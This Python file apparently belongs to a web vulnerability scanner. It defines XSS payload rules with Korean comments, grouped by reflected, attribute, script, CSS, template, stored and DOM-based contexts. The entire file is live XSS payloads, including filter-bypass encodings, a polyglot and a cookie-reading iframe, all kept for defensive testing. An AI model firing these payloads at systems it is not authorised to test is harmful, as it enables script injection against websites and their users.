from __future__ import annotations

_DOM_QUERY_PAYLOADS = [
    "<img src=x onerror=alert(1)>",
    "<svg onload=alert(1)>",
    "<video src=x onerror=alert(1)>",
    "<details open ontoggle=alert(1)>",
    "<input autofocus onfocus=alert(1)>",
    "<marquee onstart=alert(1)>xss</marquee>",
    "<img src=x onerror=alert`1`>",
    '"><img src=x onerror=alert(1)>',
    "'><img src=x onerror=alert(1)>",
    "<script>alert(1)</script>",
    "<svg><script>alert(1)</script></svg>",
    "'-alert(1)-'",
    '";alert(1);//',
    "';alert(1);//",
    "${alert(1)}", 
    "javascript:alert(1)",
]

XSS_RULES: list[dict] = [
    # ── reflected: 반사형 XSS (입력이 응답에 그대로 반사되는 지점) ──
    {
        "attack_id": "PL-XSS-ATTR-VALUE",
        "vuln_type": "xss",
        "technique": "attr_value",
        "category": "reflected",
        "sequence": ["baseline", "attack"],
        "payload_templates": {
            "attack": [
                '"><img src=x onerror=alert(1)>',
                '"><svg onload=alert(1)>',
                '" onmouseover=alert(1) x="',
                '" autofocus onfocus=alert(1) x="',
                '" oninput=alert(1) x="',
                '" onclick=alert(1) x="',
                '"><img src=x onerror=alert`1`>',
                '"><details open ontoggle=alert(1)>',
                '"><body onpageshow=alert(1)>',
                '"><input autofocus onfocus=alert(1)>',
                '"><marquee onstart=alert(1)>xss</marquee>',
                '"><video src=x onerror=alert(1)>',
                '"><audio src=x onerror=alert(1)>',
                '"><iframe srcdoc="<script>alert(1)</script>">',
                '"><object data="javascript:alert(1)">',
                "'><img src=x onerror=alert(1)>",
                "'><svg onload=alert(1)>",
                "' onmouseover=alert(1) x='",
                "' autofocus onfocus=alert(1) x='",
                '";alert(1);//',
                "';alert(1);//",
            ],
        },
    },
    {
        "attack_id": "PL-XSS-ATTR-HREF",
        "vuln_type": "xss",
        "technique": "attr_href",
        "category": "reflected",
        "sequence": ["baseline", "attack"],
        "payload_templates": {
            "attack": [
                "javascript:alert(1)",
                "JavaScript:alert(1)",
                "j&#97;vascript:alert(1)",
                "java\tscript:alert(1)",
                "java\nscript:alert(1)",
                "data:text/html,<script>alert(1)</script>",
                "data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==",
                "vbscript:alert(1)",
                '" onmouseover=alert(1) href="#',
                '" onfocus=alert(1) href="#',
            ],
        },
    },
    {
        "attack_id": "PL-XSS-ATTR-EVENT",
        "vuln_type": "xss",
        "technique": "attr_event",
        "category": "reflected",
        "sequence": ["baseline", "attack"],
        "payload_templates": {
            "attack": [
                '";alert(1);//',
                "';alert(1);//",
                '";alert(1);x="',
                '`-alert(1)-`',
                "';alert`1`;//",
                '"><img src=x onerror=alert(1)>',
            ],
        },
    },
    {
        "attack_id": "PL-XSS-SCRIPT",
        "vuln_type": "xss",
        "technique": "script",
        "category": "reflected",
        "sequence": ["baseline", "attack"],
        "payload_templates": {
            "attack": [
                '";alert(1);//',
                "';alert(1);//",
                '";alert(document.domain);//',
                "';alert(document.domain);//",
                "`-alert(1)-`",
                "</script><script>alert(1)</script>",
                "</script><img src=x onerror=alert(1)>",
                "'+alert(1)+'",
                "',alert(1),'",
                "';throw/**/onerror=alert,{token};//",
            ],
        },
    },
    {
        "attack_id": "PL-XSS-SCRIPT-RAW",
        "vuln_type": "xss",
        "technique": "script_raw",
        "category": "reflected",
        "sequence": ["baseline", "attack"],
        "payload_templates": {
            "attack": [
                "alert(1)",
                "eval('\\x61lert\\x281\\x29')",
                "Function('ale'+'rt(1)')()",
                "setTimeout(alert,0,{token})",
                "alert`1`",
                "location='javascript:alert(1)'",
                "document.write('<script>alert(1)<\\/script>')",
            ],
        },
    },
    {
        "attack_id": "PL-XSS-HTML-COMMENT",
        "vuln_type": "xss",
        "technique": "html_comment",
        "category": "reflected",
        "sequence": ["baseline", "attack"],
        "payload_templates": {
            "attack": [
                "--><img src=x onerror=alert(1)><!--",
                "--><svg onload=alert(1)><!--",
                "--><script>alert(1)</script><!--",
                "--><![if]><img src=x onerror=alert(1)><!-->",
            ],
        },
    },
    {
        "attack_id": "PL-XSS-BODY",
        "vuln_type": "xss",
        "technique": "body",
        "category": "reflected",
        "sequence": ["baseline", "attack"],
        "payload_templates": {
            "attack": [
                "<scrIpt>alert(1);</scRipt>",
                "<img src=x onerror=alert(1)>",
                "<img src=x onerror=prompt()>",
                "<svg onload=alert(1)>",
                "<img src=x onerror=alert`1`>",
                '<img src="javascript:alert(1)">',
                "<svg/onload=alert(1)>",
                "<svg><animate onbegin=alert(1) attributeName=x></animate></svg>",
                "<b onMouseOver=alert(1);>test</b>",
                "<script>alert(1)</script>",
                "<script src=data:,alert(1)></script>",
                "<body onload=alert(1)>",
                "<input autofocus onfocus=alert(1)>",
                "<details open ontoggle=alert(1)>",
                "<video src=x onerror=alert(1)>",
                "<audio src=x onerror=alert(1)>",
                '<iframe src="javascript:alert(1)">',
                '<iframe srcdoc="<script>alert(1)</script>">',
                "<form action=javascript:alert(1)><input type=submit>",
                '<math><annotation encoding="text/html"><script>alert(1)</script></annotation></math>',
                '<object data="javascript:alert(1)">',
                "<marquee onstart=alert(1)>xss</marquee>",
            ],
        },
    },
    {
        "attack_id": "PL-XSS-CSS",
        "vuln_type": "xss",
        "technique": "css",
        "category": "reflected",
        "sequence": ["baseline", "attack"],
        "payload_templates": {
            "attack": [
                '<style>*{x:expression(alert(1))}</style>',
                "@import 'javascript:alert(1)';",
                "background:url(javascript:alert(1))",
                '}</style><img src=x onerror=alert(1)>',
                '};alert(1);//',
            ],
        },
    },
    {
        "attack_id": "PL-XSS-JSON",
        "vuln_type": "xss",
        "technique": "json",
        "category": "reflected",
        "sequence": ["baseline", "attack"],
        "payload_templates": {
            "attack": [
                '","<script>alert(1)</script>":"',
                "</script><script>alert(1)</script>",
                r'<script>alert(1)</script>',
                "&lt;script&gt;alert(1)&lt;/script&gt;",
            ],
        },
    },
    {
        "attack_id": "PL-XSS-FILTER-BYPASS",
        "vuln_type": "xss",
        "technique": "filter_bypass",
        "category": "reflected",
        "sequence": ["baseline", "attack"],
        "payload_templates": {
            "attack": [
                "\0<scrIpt>alert(1);</scRipt>",
                "<ImG sRc=x OnErRoR=alert(1)>",
                "<ScRiPt>alert(1)</ScRiPt>",
                "<img\tsrc=x\tonerror=alert(1)>",
                "<img\nsrc=x\nonerror=alert(1)>",
                "<img/src=x/onerror=alert(1)>",
                "%253Cscript%253Ealert(1)%253C/script%253E",
                "%3Cscript%3Ealert(1)%3C/script%3E",
                "<img src=x onerror&#61;alert(1)>",
                "<img src=x onerror=alert`1`>",
                "<img src=x o/**/nerror=alert(1)>",
                '<svg><script>alert&lpar;{token}&rpar;</script></svg>',
                "<script>eval(String.fromCharCode(97,108,101,114,116,40,49,41))</script>",
                "<script>eval(atob('YWxlcnQoMSk='))</script>",
                '<p onpointerover=alert(1)>hover me</p>',
                "<img src=x onerror=alert(1) >",
            ],
        },
    },
    {
        # textarea/title/noscript/xmp 같은 raw-text 요소는 내용을 순수 텍스트로 렌더링하므로
        # 일반 payload가 안 먹힘 - 실제 열려있는 태그가 뭐든 닫히도록 종료 태그를 전부 붙인 뒤 exploit을 이어붙임
        "attack_id": "PL-XSS-RAWTEXT-ESCAPE",
        "vuln_type": "xss",
        "technique": "raw_text_escape",
        "category": "reflected",
        "sequence": ["baseline", "attack"],
        "payload_templates": {
            "attack": [
                "</textarea></title></noscript></xmp><script>alert(1)</script>",
                "</textarea></title></noscript></xmp><img src=x onerror=alert(1)>",
                "</textarea></title></noscript></xmp><svg onload=alert(1)>",
            ],
        },
    },
    # ── template: 템플릿 인젝션(SSTI 계열) ──
    {
        "attack_id": "PL-XSS-TEMPLATE",
        "vuln_type": "xss",
        "technique": "template",
        "category": "template",
        "sequence": ["baseline", "attack"],
        "payload_templates": {
            "attack": [
                "{{constructor.constructor('alert(1)')()}}",
                "{{7*7}}",
                "{{_c.constructor('alert(1)')()}}",
                "{{{<script>alert(1)</script>}}}",
            ],
        },
    },
    # ── stored: 저장형 XSS (저장 후 재조회 시 발화) ──
    {
        "attack_id": "PL-XSS-STORED",
        "vuln_type": "xss",
        "technique": "stored",
        "category": "stored",
        "sequence": ["baseline", "attack"],
        "payload_templates": {
            "attack": [
                "<script>alert(document.domain)</script>",
                "<img src=x onerror=alert(document.domain)>",
                "<svg onload=alert(document.domain)>",
                "<img/onerror=alert(1) src=x>",
                "<svg/onload=alert(1)>",
                "<iframe src=javascript:alert(document.cookie)>",
                "[xss](javascript:alert(1))",
                '"><img src=x onerror=alert(1) x="',
                "<input autofocus onfocus=alert(1)>",
                "<details open ontoggle=alert(document.domain)>",
                "jaVasCript:/*-/*`/*\\`/*'/*\"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\\x3csVg/<sVg/oNloAd=alert()//>\\x3e",
            ],
        },
    },
    # ── dom: DOM 기반 XSS (헤드리스 확인). 소스는 fragment(location.hash)·쿼리(location.search) ──
    {
        "attack_id": "PL-XSS-DOM",
        "vuln_type": "xss",
        "technique": "dom",
        "category": "dom",
        # attack=fragment(hash) 소스, attack_query=쿼리(search) 소스 — 생성부에서 step별로 주입 경로 분기
        "sequence": ["baseline", "attack", "attack_query"],
        "payload_templates": {
            # fragment 주입 시 _inject_fragment가 "#"를 lstrip 후 다시 붙여 "#" 접두 유무가 소거되므로 "#" 접두본만 정본으로 남김
            "attack": [
                "#<img src=x onerror=alert(1)>",
                "#<svg onload=alert(1)>",
                "'-alert(1)-'",
            ],
            "attack_query": _DOM_QUERY_PAYLOADS,
        },
    },
]
